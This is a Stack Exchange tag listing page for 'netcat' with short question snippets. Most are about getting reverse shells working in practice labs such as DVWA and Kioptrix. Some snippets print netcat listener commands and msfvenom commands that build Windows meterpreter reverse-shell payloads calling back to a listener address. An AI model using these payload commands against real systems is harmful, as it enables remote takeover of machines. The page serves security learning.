Skip to main content

Questions tagged [netcat]

A computer networking utility for reading from and writing to network connections using TCP or UDP

1 vote
0 answers
810 views

Reverse shell not working [closed]

I'm running a DVWA container on my kali VM using: docker run --rm -it -p 80:80 vulnerables/web-dvwa Network interface details: Kali docker0 int: 172.17.0.1/16 Kali eth0 int: 192.168.1.233/24 DVWA ...
registry4059's user avatar
0 votes
2 answers
332 views

if an attacker connects to your machine with a reverse shell can you take control of their machine using the listener they setup

If an attacker were to set up a netcat listener (nc -lvnp 4444), then is it possible to take control of their device using that listener? Whenever I look for an answer online, all I can find is how to ...
Michael Kershaw's user avatar
1 vote
1 answer
1k views

Reverse PHP shell exit when netcat listening

My reverse shell is exiting when i lsten it with netcat: here is netcat output: listening on [any] 5555 ... connect to [10.9.3.117] from (UNKNOWN) [10.10.47.117] 37602 bash: cannot set terminal ...
Grainbox's user avatar
0 votes
2 answers
719 views

Why can't I transfer executable files with netcat? [closed]

I have two lab machines, one Kali and one Windows 10. Netcat is running on both and both are communicating successfully. If I create a simple text file I can transfer the file from Kali onto Windows ...
trallgorm's user avatar
  • 885
1 vote
1 answer
2k views

netcat vs nmap for banner grabbing?

I am preparing for a security exam and a question I failed in a practice has the following: A command line tool that can be used for banner grabbing is called: A) tcpdump B) netcat C) nmap D) ...
Nimrod Sadeh's user avatar
0 votes
1 answer
9k views

MSF Venom Reverse TCP-Shell: Meterpreter and Netcat Listeners not responsive

I have created a MSFVenom TCP Reverse Shell Paypload that is executed on a Windows Machine: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.11.6.151 LPORT=4443 -f exe -o shell.exe In ...
GitCrush's user avatar
3 votes
1 answer
5k views

Connect msfvenom reverse shell without metasploit

For most reverse shell here, I can simply use netcat to connect: nc -nlvp 1234 But for reverse shell created by msfvenom, for example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 ...
TJCLK's user avatar
  • 838
2 votes
0 answers
1k views

Unable to start reverse shell over HTTP

I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP. Locally over TCP: Attacker terminal runs netcat to listen for a connection over port 8000: nc -...
NattyP's user avatar
  • 21
0 votes
3 answers
350 views

Php intermediate shell [closed]

Is there any way that i can use the compromised website as the shell What i am trying to achieve is to get a reverse shell on the machine,not a webshell.The target machine has a website hosted on it ...
ElementX's user avatar
0 votes
0 answers
663 views

Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn't work?

I've completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation. https://www.vulnhub.com/entry/...
Wolf's user avatar
  • 367
0 votes
1 answer
675 views

When using metasploit with my python reverse shell script I get a byte error, but it seems to work fine when using a netcat listener

When I run my python script and use netcat -nvlp 4444 the connection establishes fine and I am able to use the functions. When attempting to replicate this in metasploit I use set payload windows/...
Volapiik Vyrient's user avatar
1 vote
1 answer
3k views

I set up a successful reverse shell but my commands return nothing

I recently successfully uploaded an msfvenom binary payload into a Windows server 2008 VM. My netcat listener displays the following message: connect to [lhost ip] from (UNKNOWN) [rhost ip] 49155 ...
Non Fungible Person's user avatar
0 votes
3 answers
438 views

How to communicate with a random service after a successful netcat connection? [closed]

Let's say I perform a nmap scan and discover a list of open ports. If port 80 is opened, I will do this: $ nc IP_ADDRESS 80 GET / HTTP/1.0 This will be a simple HTTP protocol request. But what ...
tommy's user avatar
  • 1
0 votes
1 answer
371 views

Why would people connect to reverse shell's server side?

This is weird question, I implemented a reverse shell application, in which multiple commands can be executed and a keylogger can be executed. But, I need to connect to the server first, that way on ...
Dexter's user avatar
  • 11
0 votes
2 answers
1k views

netcat reverseshell hanging after connection

I put a reverse shell on a machine in my lab enviornment and it seems to just hang after there is a connection in netcat - I'm not sure why this is. I've tried different ports but no luck. See ...
t0o0tz's user avatar
  • 1

15 30 50 per page